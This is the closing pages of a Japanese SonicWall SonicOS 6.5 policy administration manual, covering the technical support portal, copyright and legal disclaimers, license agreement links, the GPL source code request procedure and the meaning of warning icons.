有効なメンテナンス契約が付属する SonicWall 製品をご購入になったお客様や、トライアルバージョ

ンをお持ちのお客様は、テクニカルサポートを利用できます。

サポートポータルには、問題を自主的にすばやく解決するために使用できるセルフヘルプツールが

あり、 24 時間 365 日ご利用いただけます。サポートポータルにアクセスするには、

https://www.sonicwall.com/ja-jp/support に移動します。

サポートポータルでは、次のことを実行できます。

• ナレッジベースの記事や技術文書を閲覧する。

• ビデオチュートリアルを視聴する。

• MySonicWall にアクセスする。

• SonicWall のプロフェッショナルサービスに関して情報を得る。

• SonicWall サポートサービスおよび保証に関する情報を確認する。

• トレーニングや認定プログラムに登録する。

• テクニカルサポートやカスタマーサービスを要求する。

SonicWall サポートへの連絡方法は、 https://www.sonicwall.com/ja-jp/support/contact-support をご覧くだ

さい。


SonicWall サポート259

https://www.sonicwall.com/ja-jp/support

https://www.sonicwall.com/ja-jp/support/contact-support

このドキュメントについて

SonicOS ポリシー更新日 - 2017 年 10 月ソフトウェアバージョン - 6.5232-001807-00 Rev A

Copyright © 2017 SonicWall Inc. All rights reserved.

SonicWall は、 SonicWall Inc. および/またはその関連会社の米国および/またはその他の国における商標または登録商標です。そ

の他の商標または登録商標は、各社の所有物です。

本文書の情報は SonicWall Inc. およびその関連会社の製品に関して提供されています。明示的または暗示的、禁反言にかかわら

ず、知的財産権に対するいかなるライセンスも、本文書または SonicWall 製品の販売に関して付与されないものとします。本製

品のライセンス契約で定義される契約条件で明示的に規定される場合を除き、 SonicWall および/またはその関連会社は一切の

責任を負わず、商品性、特定目的への適合性、あるいは権利を侵害しないことの暗示的な保証を含む (ただしこれに限定され

ない)、製品に関する明示的、暗示的、または法定的な責任を放棄します。いかなる場合においても、 SonicWall および/または

その関連会社が事前にこのような損害の可能性を認識していた場合でも、 SonicWall および/またはその関連会社は、本文書の

使用または使用できないことから生じる、直接的、間接的、結果的、懲罰的、特殊的、または付随的な損害 (利益の損失、事

業の中断、または情報の損失を含むが、これに限定されない) について一切の責任を負わないものとします。 SonicWall および/またはその関連会社は、本文書の内容の正確性または完全性に関していかなる表明または保証も行いません。また、事前の通

知なく、いつでも仕様および製品説明を変更する権利を留保するものとします。 SonicWall Inc. および/またはその関連会社は、

本文書に記載されている情報を更新する義務を負わないものとします。

詳細については、 https://www.sonicwall.com/ja-jp/legal を参照してください。

エンドユーザー製品契約

SonicWall エンドユーザ製品利用規を参照する場合は、以下に移動してください。

https://www.sonicwall.com/ja-jp/legal/license-agreements。お客様の地域に適用される EUPA を表示するには、地理的位置に応じ

て言語を選択してください。

オープンソースコード

SonicWall では、該当する場合は、 GPL、 LGPL、 AGPL のような制限付きライセンスによるオープンソースコードについて、コ

ンピュータで読み取り可能なコピーをライセンス要件に従って提供できます。コンピュータで読み取り可能なコピーを入手す

るには、 "SonicWall Inc." を受取人とする 25.00 米ドルの支払保証小切手または郵便為替と共に、書面による要求を以下の宛先ま

でお送りください。

General Public License Source Code Request SonicWall Inc. Attn: Jennifer Anderson5455 Great America ParkwaySanta Clara, CA 95054

凡例

警告: 物的損害、けが、または死亡に至る可能性があることを示しています。

注意: 手順に従わないとハードウェアの破損やデータの消失が生じる恐れがあることを示しています。

重要、メモ、ヒント、モバイル、またはビデオ: 補足情報があることを示す表示です。


SonicWall サポート260

https://www.sonicwall.com/ja-jp/legal

https://www.sonicwall.com/ja-jp/legal/license-agreements

sonicwall™ sonicos 6.5 ポリシー...sonicwall sonicos 6.5 ポリシー管理 アクセス...

Documents

sonicwall™ sonicos 6.5 ポリシー...sonicwall sonicos 6.5 ポリシー管理アクセス...